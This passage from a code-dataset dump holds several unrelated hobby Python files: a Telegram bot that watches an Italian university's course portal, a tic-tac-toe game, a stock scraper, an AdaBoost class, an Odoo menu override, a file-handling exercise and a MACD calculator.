MAIN_URL\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogger = 
logging.getLogger(__name__)\n\n# Create PicklePersistence object\npp = PicklePersistence(filename='ul_data.pickle', on_flush=True)\n\n\n\ndef start(update, context):\n start_msg = \"*Benvenuto a* @UnistudiumListenerBot.\\n\"\\\n \"Questo bot ti terrà aggiornato in tempo reale sui nuovi caricamenti effettuati dai docenti \"\\\n \"nei rispettivi corsi presenti sulla piattaforma Unistudium.\\n\\n\"\\\n \"_Il bot è da considerarsi non ufficiale, né KITLab né Unipg sono responsabili in alcun modo._\"\n\n update.message.reply_markdown(start_msg)\n\n # We have a new user, add it to the pickle file\n pp.flush()\n\n return ConversationHandler.END\n\n\ndef help_list(update, context):\n help_msg = \"Questa è una lista degli attuali *comandi* presenti nel bot:\\n\\n\"\\\n \"- /cancel: Annulla un comando in esecuzione\\n\\n\"\\\n \"- /info: Informazioni utili sul bot e sulla pagina ufficiale GitHub\\n\\n\"\\\n \"- /login: Effettua il Login sul portale Unistudium chiedendo le credenziali\\n\\n\"\\\n \"- /logout: Cancella ogni dato personale raccolto dal Bot, compresa la sessione corrente ed effettuando quindi il Logout dal portale\\n\\n\"\\\n \"- /notifications: Permette di selezionare un corso e abilitare/disabilitare le sue notifiche\\n\\n\"\\\n \"- /viewfiles: Permette di visualizzare una lista di tutti i files presenti in un determinato corso\\n\\n\"\\\n \"- /viewnews: Permette di visualizzare una lista delle news presenti nella sezione \\\"Annunci\\\" di un corso e leggerne il contenuto\"\n update.message.reply_markdown(help_msg)\n\n return ConversationHandler.END\n\n\ndef info(update, context):\n info_msg = \"*UnistudiumListener* è il miglior metodo per tenerti sempre aggiornato sugli ultimi argomenti \"\\\n \"caricati dai docenti su *Unistudium.*\\nL'intero codice sorgente è totalmente open ed è \"\\\n \"consultabile sulla pagina GitHub del creatore di questo bot.\\n\\n\"\n keyboard = [[InlineKeyboardButton(\"GitHub\", url='https://github.com/CoffeeStraw/UnistudiumListenerBot')]]\n update.message.reply_markdown(info_msg, reply_markup=InlineKeyboardMarkup(keyboard))\n\n return ConversationHandler.END\n\n\ndef login(update, context):\n \"\"\"\n Command to perform a login on the Unistudium Portal\n \"\"\"\n send_user_pwd = 'Inserisci il tuo *username* e la tua *password* nel seguente formato (con un solo spazio in mezzo):\\n\\n'\\\n 'username password\\n\\n'\\\n '_Si ricorda che il bot cancellerà immediatamente il messaggio inviato non appena sarà stato effettuato il login, per questioni di Privacy._'\n\n update.message.reply_markdown(send_user_pwd)\n return 1\n\n\ndef login_1(update, context):\n # Save credentials\n context.user_data['credentials'] = {}\n\n # Getting username and password from message's text\n user_pass = update.message.text.split(' ')\n\n # Delete user message\n context.bot.delete_message(chat_id=update.effective_message.chat_id, message_id=update.message.message_id)\n\n if len(user_pass) == 2:\n context.user_data['credentials']['username'], context.user_data['credentials']['password'] = user_pass\n else:\n update.message.reply_markdown(\"Non hai *formattato correttamente* le tue credenziali, riprova.\", reply_markup=ReplyKeyboardRemove())\n return 1\n\n # Send a message to the user to let him wait\n update.message.reply_text(\"Tentativo di connessione in corso, attendere...\")\n context.bot.send_chat_action(chat_id=update.effective_message.chat_id, action=ChatAction.TYPING)\n\n # Try login\n response = uni.reconnect(context.user_data)\n if response != \"OK\":\n 
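# reconnect() failed (server unreachable or wrong credentials); show the error and stay in this state so the user can retry\n        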
update.message.reply_markdown(response, reply_markup=ReplyKeyboardRemove())\n return 1\n\n # Getting Name and Surname of the user just to show that login was performed correctly\n main_page = context.user_data['session'].get(MAIN_URL)\n\n pattern = \"(.+?)\"\n name = re.findall(pattern, str(main_page.content))[0]\n\n update.message.reply_markdown(\"Sono riuscito a collegarmi, benvenuto *%s*!\" % name.title())\n \n # Update pickle file\n pp.flush()\n\n return ConversationHandler.END\n\n\ndef logout(update, context):\n \"\"\"\n Remove all the user's data from the pickle file\n \"\"\"\n # Delete all\n for key in list(context.user_data): # Using a list to prevent RuntimeError, since user_data could change during iterations\n del context.user_data[key]\n\n # Update pickle file\n pp.flush()\n\n # Notification message\n update.message.reply_markdown(\"Tutti i dati che erano presenti (credenziali, corsi seguiti, preferenze) sono stati rimossi con successo.\\n\\n\"\\\n \"_Questo comporta anche che non riceverai più alcuna notifica nel caso seguissi precedentemente qualche corso._\")\n return ConversationHandler.END\n\n\ndef notifications(update, context):\n # If the user hasn't requested the list of the courses already, we get it using the unistudium framework\n response = uni.reconnect(context.user_data)\n if response != \"OK\":\n # Error\n update.message.reply_markdown(response, reply_markup=ReplyKeyboardRemove())\n return ConversationHandler.END\n\n # Check if the list of the courses is available\n if 'courses' not in context.user_data:\n context.user_data['courses'] = uni.get_courseslist(context.user_data)\n\n # Send message with list of courses to the user\n choose_course_view_files = 'Seleziona il corso di cui vuoi abilitare/disabilitare notifiche'\n reply_keyboard = [[\"%s %s\" % (context.user_data['courses'][course_name]['followed'], course_name)] for course_name in context.user_data['courses'].keys()]\n update.message.reply_text(choose_course_view_files, reply_markup=ReplyKeyboardMarkup(reply_keyboard))\n \n # Update pickle file\n pp.flush()\n \n return 1\n\n\ndef notifications_1(update, context):\n course_name = update.message.text[2:]\n\n # Check for course name validity\n try:\n if context.user_data['courses'][course_name]['followed'] == '🔕':\n context.user_data['courses'][course_name]['followed'] = '🔔'\n update.message.reply_markdown('Riprenderai a ricevere le notifiche dal corso di ' + course_name, reply_markup=ReplyKeyboardRemove())\n else:\n context.user_data['courses'][course_name]['followed'] = '🔕'\n update.message.reply_markdown('Non riceverai più notifiche dal corso di ' + course_name, reply_markup=ReplyKeyboardRemove())\n except KeyError:\n no_course = 'Non è presente un corso con quel nome, riprova.'\n update.message.reply_text(no_course)\n return 1\n\n return ConversationHandler.END\n\n\ndef viewfiles(update, context):\n \"\"\"\n Request a list of files of a specific course in Unistudium\n \"\"\"\n # If the user hasn't requested the list of the courses already, we get it using the unistudium framework\n response = uni.reconnect(context.user_data)\n if response != \"OK\":\n # Error\n update.message.reply_markdown(response, reply_markup=ReplyKeyboardRemove())\n return ConversationHandler.END\n\n # Check if the list of the courses is available\n if 'courses' not in context.user_data:\n context.user_data['courses'] = uni.get_courseslist(context.user_data)\n\n # Send message with list of courses to the user\n choose_course_view_files = 'Seleziona il corso di cui vuoi vedere i 
files caricati'\n reply_keyboard = [[\"%s %s\" % (context.user_data['courses'][course_name]['followed'], course_name)] for course_name in context.user_data['courses'].keys()]\n update.message.reply_text(choose_course_view_files, reply_markup=ReplyKeyboardMarkup(reply_keyboard))\n \n # Update pickle file\n pp.flush()\n \n return 1\n\n\ndef viewfiles_1(update, context):\n course_name = update.message.text[2:]\n\n # Check for course name validity\n try:\n course_urls = context.user_data['courses'][course_name]\n except KeyError:\n no_course = 'Non è presente un corso con quel nome, riprova.'\n update.message.reply_text(no_course)\n return 1\n\n # Get list of files from Unistudium website\n files_list = uni.get_course_fileslist(context.user_data, course_urls['url'])\n context.user_data['courses'][course_name]['fileslist'] = files_list\n \n # Format the fileslist\n custom_mex = 'Ecco tutti i file che ho trovato nel corso di *%s*:\\n\\n' % course_name\n mexs = uni.get_formatted_fileslist(files_list, custom_mex)\n\n # Send list of files to the user\n for mex in mexs:\n update.message.reply_markdown(mex, reply_markup=ReplyKeyboardRemove())\n\n # Save in the pickle file\n pp.flush()\n\n return ConversationHandler.END\n\n\ndef viewnews(update, context):\n \"\"\"\n view news from unistudium\n \"\"\"\n # If the user hasn't requested the list of the courses already, we get it using the unistudium framework\n response = uni.reconnect(context.user_data)\n if response != \"OK\":\n # Error\n update.message.reply_markdown(response, reply_markup=ReplyKeyboardRemove())\n return ConversationHandler.END\n\n # Check if the list of the courses is available\n if 'courses' not in context.user_data:\n context.user_data['courses'] = uni.get_courseslist(context.user_data)\n\n # Send message with list of courses to the user\n choose_course_view_news = 'Seleziona il corso di cui vuoi vedere le news caricate'\n reply_keyboard = [[\"%s %s\" % (context.user_data['courses'][course_name]['followed'], course_name)] for course_name in context.user_data['courses'].keys()]\n update.message.reply_text(choose_course_view_news, reply_markup=ReplyKeyboardMarkup(reply_keyboard))\n\n # Save in the pickle file\n pp.flush()\n\n return 1\n\n\ndef viewnews_1(update, context):\n course_name = update.message.text[2:]\n\n # Check for course name validity\n try:\n course_urls = context.user_data['courses'][course_name]\n except KeyError:\n no_course = 'Non è presente un corso con quel nome, riprova.'\n update.message.reply_text(no_course)\n return 1\n\n # Check news availability\n course_news = uni.get_forum_news(context.user_data, course_urls['forum_url'])\n context.user_data['courses'][course_name]['newslist'] = course_news\n if not course_news:\n no_news = 'Non è presente alcuna notizia nella pagina della materia scelta.'\n update.message.reply_text(no_news, reply_markup=ReplyKeyboardRemove())\n return ConversationHandler.END\n\n # Save course selected for the next step\n context.user_data['course_selected'] = course_name\n\n # Send message to the user\n choose_news = 'Seleziona la news di cui vuoi vedere il contenuto'\n reply_keyboard = [[news_name] for news_name in course_news.keys()]\n update.message.reply_text(choose_news, reply_markup=ReplyKeyboardMarkup(reply_keyboard))\n\n # Save in the pickle file\n pp.flush()\n\n return 2\n\n\ndef viewnews_2(update, context):\n news_name = update.message.text\n \n try:\n course_name = context.user_data['course_selected']\n news = context.user_data['courses'][course_name]['newslist'][news_name]\n 
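# the saved selection has been consumed; drop it so a stale course cannot leak into a later command\n        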
del context.user_data['course_selected']\n except KeyError:\n no_news = 'La notizia indicata non esiste, riprova.'\n update.message.reply_text(no_news)\n return 2\n \n news_msg = uni.get_news_msg(context.user_data, news)\n update.message.reply_text(news_msg, reply_markup=ReplyKeyboardRemove())\n\n # Save in the pickle file\n pp.flush()\n\n return ConversationHandler.END\n\n\ndef cancel(update, context):\n \"\"\"\n Undo any command which is going on\n \"\"\"\n update.message.reply_text('Ok, comando annullato.',reply_markup=ReplyKeyboardRemove())\n return ConversationHandler.END\n\n\ndef error(update, error):\n \"\"\"\n Log Errors caused by Updates\n \"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, error)\n\n\ndef callback_query(update, context):\n query = update.callback_query\n query.answer(\"Done\")\n\n\ndef listen(bot, dp, upd_time):\n \"\"\"\n Listen for updates of files and news on Unistudium\n \"\"\"\n while True:\n print(Fore.CYAN + \"Controllo per nuovi updates...\")\n\n for uid in dp.user_data:\n # To Debug the listen function, uncomment carefully these lines\n # del dp.user_data[uid]['courses']['INGEGNERIA DEL SOFTWARE (2018/19)']['fileslist'][0][1][3]\n # dp.user_data[uid]['courses']['INGEGNERIA DEL SOFTWARE (2018/19)']['fileslist'][1][1] = []\n # quit()\n\n # Check if the server is online and the credentials are valid\n response = uni.reconnect(dp.user_data[uid])\n if response != \"OK\":\n continue\n\n # Download courses list if it doesn't exist\n if 'courses' not in dp.user_data[uid]:\n dp.user_data[uid]['courses'] = uni.get_courseslist(dp.user_data[uid])\n pp.flush()\n\n for course in dp.user_data[uid]['courses']:\n if dp.user_data[uid]['courses'][course]['followed'] == '🔕':\n # Skip this course for this user\n continue\n\n # Get the most updated files list\n new_files_list = uni.get_course_fileslist(dp.user_data[uid], dp.user_data[uid]['courses'][course]['url'])\n \n # Check if I don't have a previous version\n if not 'fileslist' in dp.user_data[uid]['courses'][course]:\n dp.user_data[uid]['courses'][course]['fileslist'] = new_files_list\n pp.flush()\n continue\n \n old_files_list = dp.user_data[uid]['courses'][course]['fileslist']\n \n # Find the differences between these two lists\n def find_diff(first_list, second_list):\n diffs = []\n # Iterate over the sections\n for first_sec in first_list:\n for second_sec in second_list:\n # If the section name is the same, we could find diffs\n if first_sec[0] == second_sec[0]:\n file_diffs = []\n for file2 in first_sec[1]:\n for file1 in second_sec[1]:\n if file2 == file1:\n break\n else:\n file_diffs.append(file2)\n if file_diffs:\n diffs.append([first_sec[0], file_diffs])\n break\n else:\n # This is a new section, add it to the diffs\n diffs.append(first_sec)\n return diffs\n\n # Find additions and removes\n additions = find_diff(new_files_list, old_files_list)\n removes = find_diff(old_files_list, new_files_list)\n\n # Get the most updated forum news\n # TO DO\n\n # Notify all the users \"registered\" of the updates\n if additions or removes:\n # Update data\n dp.user_data[uid]['courses'][course]['fileslist'] = new_files_list\n pp.flush()\n print(Fore.GREEN + \"Ho trovato nuovi updates nel corso di %s (per uid: %d)\" % (course, uid))\n\n # If we have both additions and removes\n new_upd_msg = \"Ciao, ho trovato dei nuovi aggiornamenti nel corso di:\\n*{}*\".format(course)\n if additions and removes:\n custom_mex = new_upd_msg + \"\\n\\n📎 *Files aggiunti:*\\n\\n\"\n mexs = uni.get_formatted_fileslist(additions, 
custom_mex)\n\n for mex in mexs:\n bot.sendMessage(uid, mex, parse_mode=ParseMode.MARKDOWN)\n\n custom_mex = \"💣 *Files rimossi:*\\n\\n\"\n mexs = uni.get_formatted_fileslist(removes, custom_mex)\n\n for mex in mexs:\n bot.sendMessage(uid, mex, parse_mode=ParseMode.MARKDOWN)\n elif additions:\n custom_mex = new_upd_msg + \"\\n\\n📎 *Files aggiunti:*\\n\\n\"\n mexs = uni.get_formatted_fileslist(additions, custom_mex)\n\n for mex in mexs:\n bot.sendMessage(uid, mex, parse_mode=ParseMode.MARKDOWN)\n elif removes:\n custom_mex = new_upd_msg + \"\\n\\n💣 *Files rimossi:*\\n\\n\"\n mexs = uni.get_formatted_fileslist(removes, custom_mex)\n\n for mex in mexs:\n bot.sendMessage(uid, mex, parse_mode=ParseMode.MARKDOWN)\n\n # Wait for a bit, then check for updates once more\n print(Fore.CYAN + \"Aspetto per altri %d secondi\" % UPD_TIME)\n time.sleep(upd_time)\n\n\ndef main():\n # Setting up\n colorama.init(autoreset=True)\n\n # Create the EventHandler and pass it your bot's token.\n updater = Updater(TOKEN, persistence=pp, use_context=True)\n dp = updater.dispatcher\n\n # Adding all the handler for the commands\n cmd_login = ConversationHandler(\n entry_points=[CommandHandler('login', login)],\n\n states={\n 1: [MessageHandler(Filters.text, login_1)]\n },\n\n fallbacks=[CommandHandler('cancel', cancel)]\n )\n\n cmd_notifications = ConversationHandler(\n entry_points=[CommandHandler('notifications', notifications)],\n\n states={\n 1: [MessageHandler(Filters.text, notifications_1)]\n },\n\n fallbacks=[CommandHandler('cancel', cancel)]\n )\n\n cmd_viewfiles = ConversationHandler(\n entry_points=[CommandHandler('viewfiles', viewfiles)],\n\n states={\n 1: [MessageHandler(Filters.text | Filters.command, viewfiles_1)]\n },\n\n fallbacks=[CommandHandler('cancel', cancel)]\n )\n\n cmd_viewnews = ConversationHandler(\n entry_points=[CommandHandler('viewnews', viewnews)],\n\n states={\n 1: [MessageHandler(Filters.text, viewnews_1)],\n 2: [MessageHandler(Filters.text, viewnews_2)],\n },\n\n fallbacks=[CommandHandler('cancel', cancel)]\n )\n\n dp.add_handler(CommandHandler('start', start))\n dp.add_handler(CommandHandler('help', help_list))\n dp.add_handler(CommandHandler('info', info))\n dp.add_handler(CommandHandler('logout', logout))\n dp.add_handler(cmd_login)\n dp.add_handler(cmd_notifications)\n dp.add_handler(cmd_viewfiles)\n dp.add_handler(cmd_viewnews)\n dp.add_handler(CommandHandler('cancel', cancel))\n\n # Adding callback_query handler\n dp.add_handler(CallbackQueryHandler(callback_query))\n # Log all errors\n dp.add_error_handler(error)\n\n # Start the Bot\n updater.start_polling()\n print(\"Ready to work.\")\n\n # Start the listener for new files in courses' page\n listener = threading.Thread(target=listen, args=(updater.bot, dp, UPD_TIME))\n listener.start()\n \n # Run the bot until you press Ctrl-C or the process receives SIGINT, SIGTERM or SIGABRT.\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CoffeeStraw/UnistudiumListenerBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20267,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"9603142896","text":"def create_board(board):\n '''Create a board with three rows and three columns.'''\n for row in board:\n print('|', end=\"\")\n for slot in row:\n print(f\" {slot} \", end=\"|\")\n print()\n\n\ndef check_move(move):\n '''Check if user move equal to number and not out of board.'''\n if not move.isnumeric() or int(move) > 9 or int(move) 
< 1:\n print(\"This's not a valid position!\")\n return False\n else:\n return True\n\n\ndef occupied_box(coords, board):\n '''Check if user move is on a free position.'''\n row = coords[0]\n col = coords[1]\n if board[row][col] != \"_\":\n print(\"This box is already occupied!\")\n return True\n else:\n return False\n\n\ndef coordinates(move):\n '''Determine row and column according to user move.'''\n row = int(move / 3)\n col = move\n if col > 2:\n col = int(col % 3)\n return (row, col)\n\n\ndef add_to_board(coords, board, active_user):\n '''Add user move to a position on a board.'''\n row = coords[0]\n col = coords[1]\n board[row][col] = active_user\n\n\ndef current_user(user):\n '''Define which user has to make a move.'''\n if user:\n return \"X\"\n else:\n return \"O\"\n\n\ndef is_win(user, board):\n '''Check winning positions.'''\n if check_row(user, board):\n return True\n if check_col(user, board):\n return True\n if check_diag(user, board):\n return True\n return False\n\n\ndef check_row(user, board):\n for row in board:\n complete_row = True\n for slot in row:\n if slot != user:\n complete_row = False\n break\n if complete_row:\n return True\n return False\n\n\ndef check_col(user, board):\n for col in range(3):\n complete_col = True\n for row in range(3):\n if board[row][col] != user:\n complete_col = False\n break\n if complete_col:\n return True\n return False\n\n\ndef check_diag(user, board):\n if board[0][0] == user and board[1][1] == user and board[2][2] == user:\n return True\n elif board[0][2] == user and board[1][1] == user and board[2][0] == user:\n return True\n else:\n return False\n\ndef new_game():\n '''Offer user to restart the game or to quit.'''\n to_continue = input(\"Do you want to start new game. Type 'Y' or 'N': \").upper()\n if to_continue == 'Y':\n tic_toc_toe()\n else:\n print('GAME OVER')\n\n\n\ndef tic_toc_toe():\n print(\"WELCOME TO TIC TOC TOE! 
CAll A FRIEND AND HAVE FUN!\")\n board = [\n [\"_\", \"_\", \"_\"],\n [\"_\", \"_\", \"_\"],\n [\"_\", \"_\", \"_\"]\n ]\n user = True\n turns = 0\n\n while turns < 9:\n active_user = current_user(user)\n create_board(board)\n if turns == 0 or turns % 2 == 0:\n move = input(\"Player 'X' make your move to a position from 1 through 9: \")\n else:\n move = input(\"Player 'O' make your move to a position from 1 through 9: \")\n if not check_move(move):\n print(\"Please try again.\")\n continue\n move = int(move) - 1\n coords = coordinates(move)\n if occupied_box(coords, board):\n print(\"Please try again\")\n continue\n add_to_board(coords, board, active_user)\n if is_win(active_user, board):\n print(f\"Player '{active_user.upper()}' won!\")\n create_board(board)\n new_game()\n break\n\n turns += 1\n if turns == 9:\n print(\"Draw!\")\n create_board(board)\n new_game()\n user = not user\n\n\ntic_toc_toe()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"IlonaBrushnovska/Tic-tac-toe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29660872427","text":"#scrape.py\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nimport pandas as pd\n\n\ndef get_most_active():\n url = 'https://finance.yahoo.com/trending-tickers'\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\"\n }\n ticker_data = {}\n r = requests.get(url, headers=headers)\n data = r.text \n soup = BeautifulSoup (data, 'html.parser')\n alldata = soup.find_all('tr', class_='simpTblRow Bgc($hoverBgColor):h BdB Bdbc($seperatorColor) Bdbc($tableBorderBlue):h H(32px) Bgc($lv2BgColor)')\n table1 = alldata[0]\n for cols in alldata:\n t = cols.find_all('td')\n cells = cols.find_all('fin-streamer')\n if cells:\n ticker = t[0].text\n name = t[1].text\n value = t[2].text\n time = t[3].text\n change = t[4].text\n percent_change = t[5].text\n volume = t[6].text\n market_cap = t[7].text\n ticker_data[ticker] = {\n 'name': name,\n 'value': value,\n 'time': time,\n 'change': change,\n 'percent_change': percent_change,\n 'volume': volume,\n 'market_cap': market_cap,\n }\n return ticker_data\n\n\ndef create_df():\n ticker_data = get_most_active()\n stock_data = []\n for ticker, data in ticker_data.items():\n value = get_value(data)\n timestamp = pd.Timestamp.now()\n stock_data.append({\n 'timestamp': timestamp,\n 'ticker': ticker,\n 'name': data['name'],\n 'value': value,\n 'time': data['time'],\n 'change': data['change'],\n 'percent_change': data['percent_change'],\n 'volume': data['volume'],\n 'market_cap': data['market_cap']\n })\n df = pd.DataFrame(stock_data)\n return df\n\n\ndef get_all_names():\n ticker_data = get_most_active()\n ticker_names = []\n for ticker, data in ticker_data.items():\n ticker_names.append(data['name'])\n return ticker_names\n\n\ndef get_biggest_movers():\n ticker_data = get_most_active()\n # Sort the ticker data by absolute value of percent change\n sorted_ticker_data = sorted(ticker_data.items(), key=lambda x: abs(float(x[1]['percent_change'][:-1])), reverse=True)\n biggest_movers = []\n for ticker, data in sorted_ticker_data[:5]:\n biggest_movers.append((ticker, data['percent_change']))\n return biggest_movers\n\n\ndef get_name(ticker_name):\n return ticker_name['name']\n\n\ndef get_value(ticker_name):\n return ticker_name['value']\n\n\ndef get_time(ticker_name):\n return ticker_name['time']\n\n\ndef 
get_change(ticker_name):\n return ticker_name['change']\n\n\ndef get_percent_change(ticker_name):\n return ticker_name['percent_change']\n\n\ndef get_volume(ticker_name):\n return ticker_name['volume']\n\n\ndef get_market_cap(ticker_name):\n return ticker_name['market_cap']\n","repo_name":"alogan1259/trending_tickers_api","sub_path":"api/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33694376712","text":"\"\"\"\n===================================================\n Introduction to Machine Learning (67577)\n===================================================\n\nSkeleton for the AdaBoost classifier.\n\nAuthor: Noga Zaslavsky\nEdited: Yoav Wald, May 2018\n\n\"\"\"\nimport numpy as np\n\nclass AdaBoost(object):\n\n def __init__(self, WL, T):\n \"\"\"\n Parameters\n ----------\n WL : the class of the base weak learner\n T : the number of base learners to learn\n \"\"\"\n self.WL = WL\n self.T = T\n self.h = [None]*T # list of base learners\n self.w = np.zeros(T) # weights\n\n def train(self, X, y):\n \"\"\"\n Train this classifier over the sample (X,y)\n \"\"\"\n m, d = X.shape\n D = np.full(m, 1/m)\n for i in range(self.T):\n self.h[i] = self.WL(D, X, y)\n error_i = np.dot(D, (y != self.h[i].predict(X)))\n self.w[i] = 0.5 * np.log((1/error_i) - 1)\n y_hat = self.h[i].predict(X)\n D = (D * np.exp(-self.w[i] * y * y_hat)) / (D * np.exp(-self.w[i] * y * y_hat)).sum()\n\n def predict(self, X):\n \"\"\"\n Returns\n -------\n y_hat : a prediction vector for X\n \"\"\"\n temp = []\n for t in range(self.T):\n temp.append(np.dot(self.w[t], self.h[t].predict(X)))\n return np.sign(np.array(temp).sum(axis=0))\n\n def error(self, X, y):\n \"\"\"\n Returns\n -------\n the error of this classifier over the sample (X,y)\n \"\"\"\n y_hat = self.predict(X)\n y = np.array(y)\n return sum(y[i] != y_hat[i] for i in range(len(y)))/len(y)\n\n","repo_name":"TomEliassy/Machine-Learning","sub_path":"ex2 - Adaboost, Bagging, Decision Tree/adaboost.py","file_name":"adaboost.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37578263266","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import api, fields, models, tools, _\r\nimport operator\r\n\r\n\r\nclass IrUiMenu(models.Model):\r\n _inherit = \"ir.ui.menu\"\r\n \r\n category_id = fields.Many2one('ir.ui.menu.category', string=\"Category\")\r\n \r\n @api.model\r\n @tools.ormcache_context('self._uid', 'debug', keys=('lang',))\r\n def load_menus(self, debug):\r\n \"\"\"[summary]\r\n 加载所有菜单项(所有应用程序及其子菜单)。\r\n odoo/addons/base/models/ir_ui_menu.py\r\n \r\n :return:菜单根目录\r\n :rtype:dict('children':菜单\\节点)\r\n \"\"\"\r\n \r\n fields = ['name', 'sequence', 'parent_id', 'action', 'web_icon', 'web_icon_data', 'category_id'] #增加category_id字段\r\n menu_roots = self.get_user_roots()\r\n menu_roots_data = menu_roots.read(fields) if menu_roots else []\r\n menu_root = {\r\n 'id': False,\r\n 'name': 'root',\r\n 'parent_id': [-1, ''],\r\n 'children': menu_roots_data,\r\n 'all_menu_ids': menu_roots.ids,\r\n }\r\n\r\n if not menu_roots_data:\r\n return menu_root\r\n\r\n # 与常规树视图不同,菜单完全加载,因为项目数量有限(安装所有6.1插件时为752个)\r\n menus = self.search([('id', 'child_of', menu_roots.ids)])\r\n menu_items = menus.read(fields)\r\n\r\n # 在序列的末尾添加根,这样当放入id:item映射时,它们将覆盖从完整菜单读取的等效菜单项,从而在根上正确设置子菜单项。\r\n menu_items.extend(menu_roots_data)\r\n menu_root['all_menu_ids'] = 
menus.ids # 包括菜单根!\r\n\r\n # 使用parent_id创建树\r\n menu_items_map = {menu_item[\"id\"]: menu_item for menu_item in menu_items}\r\n for menu_item in menu_items:\r\n parent = menu_item['parent_id'] and menu_item['parent_id'][0]\r\n if parent in menu_items_map:\r\n menu_items_map[parent].setdefault(\r\n 'children', []).append(menu_item)\r\n\r\n # 使用parent_id按顺序对树进行排序\r\n for menu_item in menu_items:\r\n menu_item.setdefault('children', []).sort(key=operator.itemgetter('sequence'))\r\n\r\n (menu_roots + menus)._set_menuitems_xmlids(menu_root)\r\n\r\n return menu_root","repo_name":"Jacky-odoo/cabalcon14","sub_path":"rainbow_community_theme/models/ir_ui_menu.py","file_name":"ir_ui_menu.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9901617373","text":"#!/usr/bin/env python3\n\n# Script Name: File Handling\n# Author: Gerald\n# Date of latest revision: 6/12/2023\n# Purpose: Creates a text file, edits line, then deletes \n# Instructions: \n#Using file handling commands \n#create a Python script that creates a new .txt file \n#appends three lines \n#prints to the screen the first line\n#then deletes the .txt file.\n\n\n#Declartion of varibles:\nwords = open(\"Ops10text.txt\", \"w\")\n\n#Declaration of functions:\n#words is the variable name, write is the command of what we're doing in this case writing text\n# The \"\" containts the text and tells python that thats a string, while the \\n is to start a new line\n\n\n\n\n#Main\n# This writes the text in \"\" in the files\nwords.write(\"Example text\\n\")\nwords.write(\"This is a second line of text\\n\")\nwords.write(\"A final line of text\\n\")\n#then you have to close the file since you cant just switch to read\nwords.close()\n#open up the file in read mode the \"r\" denotes read mode\nwords = open(\"Ops10text.txt\", \"r\")\n# I dont know why below doesnt work, not even when I switch it to 1\n#words.readlines(0)\n#Chat GPT saids to make it a variable first and I dont understand why\n#lines = words.readlines()\n\n# Print the first line\nlines = words.readlines()\n#The Code below deletes the fiel\nline1 = lines[0]\nprint(line1)\n\n# Close the file by calling the close() method\nwords.close()\n# Remove the file using the os module\nimport os\nos.remove(\"Ops10text.txt\")\n\n","repo_name":"gerreit/301-Code-Challenge","sub_path":"10 Python file handling.py","file_name":"10 Python file handling.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22949838976","text":"import pandas as pd\nimport futuquant as ft\nimport numpy as np\nimport datetime\nimport time\n\nfrom futuquant.myProFiles import stockData\n\nquote_ctx = ft.OpenQuoteContext(host='127.0.0.1', port=11111)\npre_day = '2017-05-30'\n# 获取数据\n# _, df = pd.read_csv('C:/Users/HXWD/Desktop/000001.csv', encoding='gbk')\n_, df = quote_ctx.get_history_kline(\"HK.00700\", start=pre_day)\nret_data = stockData.getStockInfoRealTime(quote_ctx, stockCode='HK.00700')\n\n_, df = quote_ctx.get_history_kline(\"HK.00700\", start=pre_day)\ndf.columns = ['code', 'time_key', 'open', 'close', 'high', 'low', 'pe_ratio', 'turnover_rate', 'volume', 'turnover',\n 'change_rate']\n# df = df[['date', 'open', 'high', 'low', 'close', 'volume', 'amt']]\ndf = df[['close', 'time_key']]\nret_data = stockData.getStockInfoRealTime(quote_ctx, stockCode='HK.00700')\nret_data = ret_data[['last_price', 'data_date']]\n# 
ret_data.columns = [['close', 'time_key']]\nret_data = ret_data.rename(columns={'last_price': 'close'})\nret_data = ret_data.rename(columns={'data_date': 'time_key'})\nret_data[[\"time_key\"]] = ret_data[[\"time_key\"]] + \" 00:00:00\"\ndf = pd.concat([df, ret_data], axis=0)\ndf.index = pd.Series(range(len(df)))\n\ndf.head()\n\n\ndef get_EMA(df, N):\n    # .loc replaces the DataFrame.ix indexer removed from modern pandas\n    for i in range(len(df)):\n        if i == 0:\n            df.loc[i, 'ema'] = df.loc[i, 'close']\n        if i > 0:\n            df.loc[i, 'ema'] = (2 * df.loc[i, 'close'] + (N - 1) * df.loc[i - 1, 'ema']) / (N + 1)\n    ema = list(df['ema'])\n    return ema\n\n\ndef get_MACD(df, short=12, long=26, M=9):\n    a = get_EMA(df, short)\n    b = get_EMA(df, long)\n    df['dif'] = pd.Series(a) - pd.Series(b)\n    for i in range(len(df)):\n        if i == 0:\n            df.loc[i, 'dea'] = df.loc[i, 'dif']\n        if i > 0:\n            df.loc[i, 'dea'] = (2 * df.loc[i, 'dif'] + (M - 1) * df.loc[i - 1, 'dea']) / (M + 1)\n    df['macd'] = 2 * (df['dif'] - df['dea'])\n    df = df.sort_index(ascending=True)\n    return df\n\n\nget_MACD(df, 12, 26, 9)\ndf\n","repo_name":"dongxiao999999/futuquant","sub_path":"futuquant/myProFiles/testMacd.py","file_name":"testMacd.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"70042757650","text":"opcion=int(input(\"Ingrese la opción que desea. \\n (1) Añadir cliente, \\n (2) Eliminar cliente, \\n (3) Mostrar cliente. \\n 